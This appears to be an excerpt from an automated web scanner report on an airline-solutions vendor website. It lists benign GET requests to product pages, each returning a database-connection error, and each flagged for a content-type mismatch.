GET /home/products_services/product/sabre_aircentre_recovery_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322681; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_aircentre_roster_maker HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322681; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A1%3Bs%3A64%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_flight%2F%22%3Bi%3A2%3Bs%3A32%3A%22%2Fproducts_services%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A72%3A%22%2Fproducts_services%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fproducts_services%2Fsabresonic_css%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_aircentre_staff_admin HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322679; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A4%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_aircentre_staff_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322691; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A1%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_qik_analysis_system%2F%22%3Bi%3A4%3Bs%3A32%3A%22%2Fproducts_services%2Fcredit_suite%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_aircentre_staff_planner HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322691; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_airport_data_intelligence HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322704; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A4%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_airvision_cargo_revenue_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322708; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_planner%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fagency_management%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_airvision_codeshare_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322706; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_airvision_fares_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322720; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_airvision_fleet_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322725; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A3%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A4%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_airvision_group_ecommerce HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322733; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_airvision_group_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322736; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fsabre_aircentre_airspace_flow_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:31:56 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_airvision_in-flight HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322742; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A64%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_flight%2F%22%3Bi%3A3%3Bs%3A32%3A%22%2Fproducts_services%2Fweb_services%2F%22%3Bi%3A4%3Bs%3A72%3A%22%2Fproducts_services%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:32:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_airvision_network_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322749; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A1%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_qik_analysis_system%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:56:13 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_airvision_profit_essentials HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322747; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A1%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A3%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:56:15 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_airvision_profit_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322766; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:56:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_airvision_revenue_accounting HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322771; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_cargo_revenue_manager%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_planner%2F%22%3Bi%3A2%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fagency_management%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:57:34 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_airvision_revenue_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322768; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airport_data_intelligence%2F%22%3Bi%3A1%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:58:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
